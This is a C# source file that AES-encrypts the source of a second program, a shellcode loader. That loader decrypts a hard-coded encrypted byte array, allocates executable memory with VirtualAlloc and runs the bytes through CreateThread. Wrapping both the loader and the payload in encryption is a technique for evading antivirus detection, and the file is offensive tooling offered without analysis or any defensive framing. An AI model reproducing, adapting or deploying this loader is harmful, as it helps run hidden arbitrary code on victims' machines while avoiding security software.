﻿using System;
using System.IO;
using System.Security.Cryptography;
using encrypt_decrypt2;
namespace encrypt_decrypt
{
    class MainClass
    {
        public static void Main(string[] args)
        {

         

            var enc_str = EncryptString("217A25432A462D4A614E645267556B38", @"using System;using System.Reflection;using System.Runtime.InteropServices;using System.Security.Cryptography;using System.IO;
                            namespace App{class MainClass{private static UInt32 MEM_COMMIT = 0x1000;private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;[DllImport(""kernel32"")]private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,UInt32 size, UInt32 flAllocationType, UInt32 flProtect);[DllImport(""kernel32"")]private static extern IntPtr CreateThread(UInt32 lpThreadAttributes,UInt32 dwStackSize,UInt32 lpStartAddress,IntPtr param,UInt32 dwCreationFlags,ref UInt32 lpThreadId);[DllImport(""kernel32"")]private static extern UInt32 WaitForSingleObject(IntPtr hHandle,UInt32 dwMilliseconds);
  static byte[] Decrypt(byte[] cipherData,byte[] Key, byte[] IV)
        {
            MemoryStream ms = new MemoryStream();
            Rijndael alg = Rijndael.Create();
            alg.Key = Key;
            alg.IV = IV;
            CryptoStream cs = new CryptoStream(ms,
                alg.CreateDecryptor(), CryptoStreamMode.Write);
            cs.Write(cipherData, 0, cipherData.Length);
            cs.Close();
            byte[] decryptedData = ms.ToArray();
            return decryptedData;
        }
         static byte[] Decrypt(byte[] cipherData, string Password)
        {
            PasswordDeriveBytes pdb = new PasswordDeriveBytes(Password,
                new byte[] {0x49, 0x76, 0x61, 0x6e, 0x20, 0x4d, 
            0x65, 0x64, 0x76, 0x65, 0x64, 0x65, 0x76});
            return Decrypt(cipherData, pdb.GetBytes(32), pdb.GetBytes(16));
        }

                            public void start(){
                                        byte[] shellcode =Decrypt(new byte[]{0xe5,0x75,0x53,0x28,0xe7,0xd7,0x7f,0x2d,0xa8,0x4a,0x30,0x59,0x8a,0x57,0xcc,0x4c,0x21,0xaa,0x71,0x9e,0x73,0x4f,0x2b,0xef,0xb4,0x1a,0xa5,0x1a,0x25,0x8f,0x64,0x14,0xdf,0xfe,0x79,0x66,0x6d,0xa1,0xaf,0x88,0xbd,0xe8,0xb5,0x06,0xc0,0x00,0xe7,0xbe,0xe9,0x4e,0x67,0xa8,0x44,0x1a,0x4b,0x66,0xac,0xc1,0x39,0x90,0x45,0x26,0x59,0xdb,0x0b,0x25,0x29,0xa4,0x64,0x74,0xc2,0xf5,0x19,0xba,0x2f,0x59,0x1c,0x90,0x6c,0xb5,0x1a,0x2c,0x22,0xc3,0x62,0x2a,0x5f,0xaf,0xae,0xb0,0x84,0xf3,0x21,0xd0,0x20,0x55,0xbd,0x86,0x8c,0x08,0xb0,0xaf,0x43,0xf8,0x58,0x86,0x76,0x7e,0x61,0xe7,0x86,0x2b,0x2d,0x93,0xa7,0xcf,0x09,0x20,0x0f,0x4b,0x71,0x22,0x61,0x67,0x3a,0xbb,0xf0,0x99,0x13,0xfc,0xc4,0xf4,0xdb,0x7d,0x83,0x85,0xcc,0xab,0xc3,0xff,0xad,0xb8,0x02,0x2f,0x94,0xf4,0x59,0x5e,0x17,0xbb,0x95,0xe1,0xc7,0x43,0x48,0x62,0xd7,0x10,0x82,0x78,0xf6,0xc8,0xda,0x9f,0x66,0xcb,0x3d,0x62,0x86,0x85,0xc3,0x14,0xc2,0x77,0x3e,0xd2,0x0d,0xf4,0x8e,0x08,0xd9,0xbb,0x22,0x29,0x9e,0x7f,0x78,0x6c,0x49,0xb2,0x86,0x8a,0x01,0x41,0x01,0x02,0xcd,0xf7,0x57,0x01,0x7b,0xe9,0x2c,0x6e,0xee,0x23,0x4e,0x19,0xc9,0xce,0xfe,0x05,0xbc,0x5d,0x88,0x06,0x8b,0xd6,0x3c,0x21,0x62,0x3d,0x94,0x35,0x0f,0x2b,0x3a,0x03,0xd2,0xc7,0xef,0x15,0xda,0xd7,0xcb,0xc7,0x63,0x46,0x34,0x34,0x02,0x20,0xfd,0x54,0x9b,0x94,0x58,0x60,0x11,0x5d,0xa2,0x2d,0x9c,0x17,0x63,0x8e,0xb6,0x1b,0xb9,0x92,0x08,0x75,0xe1,0x22,0xc5,0x72,0x58,0x57,0x50,0xa1,0x18,0x55,0x8c,0x19,0xb1,0x05,0x85,0xf2,0xfe,0x01,0x0d,0x11,0x30,0xa9,0x18,0xd0,0x89,0xfa,0x20,0x74,0x41,0x0c,0xae,0xcd,0x1c,0xfc,0x07,0x16,0xfd,0x63,0x78,0x67,0x23,0x58,0xc1,0x26,0xaa,0xa6,0x32,0xd3,0xae,0xa4,0x5d,0xcc,0x72,0x21,0x98,0x4d,0xc1,0xc7,0x66,0x49,0x6c,0x43,0x6b,0x36,0xa4,0xd1,0x62,0xae,0x73,0x73,0xd1,0xff,0xd8,0x81,0xaf,0x9c,0x7f,0x10,0xef,0x24,0x98,0x52,0xcb,0x0d,0x83,0xe4,0xb1,0x17,0x32,0x7d,0x35,0x6e,0x43,0x3c,0x2f,0x58,0x1d,0xd6,0x3a,0xa5,0xd9,0x2b,0x14,0x46,0xf3,0xc8,0x3c,0x57,0x76,0x21,0x56,0x4a,0x1b,0x08,0x57,0x54,0x85,0x52,0x26,0xf7,0xe7,0x55},""217A25432A462D4A614E645267556B38"");
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);IntPtr hThread = IntPtr.Zero;UInt32 threadId = 0;IntPtr pinfo = IntPtr.Zero;hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);WaitForSingleObject(hThread, 0xFFFFFFFF);}}}");

            Console.WriteLine(enc_str);

            Console.WriteLine(DecryptString("217A25432A462D4A614E645267556B38", enc_str));
        }
        public static string EncryptString(string key, string plainText)
        {
            byte[] iv = new byte[16];
            byte[] array;

            using (Aes aes = Aes.Create())
            {
                aes.Key = System.Text.Encoding.UTF8.GetBytes(key);
                aes.IV = iv;

                ICryptoTransform encryptor = aes.CreateEncryptor(aes.Key, aes.IV);

                using (MemoryStream memoryStream = new MemoryStream())
                {
                    using (CryptoStream cryptoStream = new CryptoStream((Stream)memoryStream, encryptor, CryptoStreamMode.Write))
                    {
                        using (StreamWriter streamWriter = new StreamWriter((Stream)cryptoStream))
                        {
                            streamWriter.Write(plainText);
                        }

                        array = memoryStream.ToArray();
                    }
                }
            }

            return Convert.ToBase64String(array);
        }
        public static string DecryptString(string key, string cipherText)
        {
            byte[] iv = new byte[16];
            byte[] buffer = Convert.FromBase64String(cipherText);

            using (Aes aes = Aes.Create())
            {
                aes.Key = System.Text.Encoding.UTF8.GetBytes(key);
                aes.IV = iv;
                ICryptoTransform decryptor = aes.CreateDecryptor(aes.Key, aes.IV);

                using (MemoryStream memoryStream = new MemoryStream(buffer))
                {
                    using (CryptoStream cryptoStream = new CryptoStream((Stream)memoryStream, decryptor, CryptoStreamMode.Read))
                    {
                        using (StreamReader streamReader = new StreamReader((Stream)cryptoStream))
                        {
                            return streamReader.ReadToEnd();
                        }
                    }
                }
            }
        }
    }
}
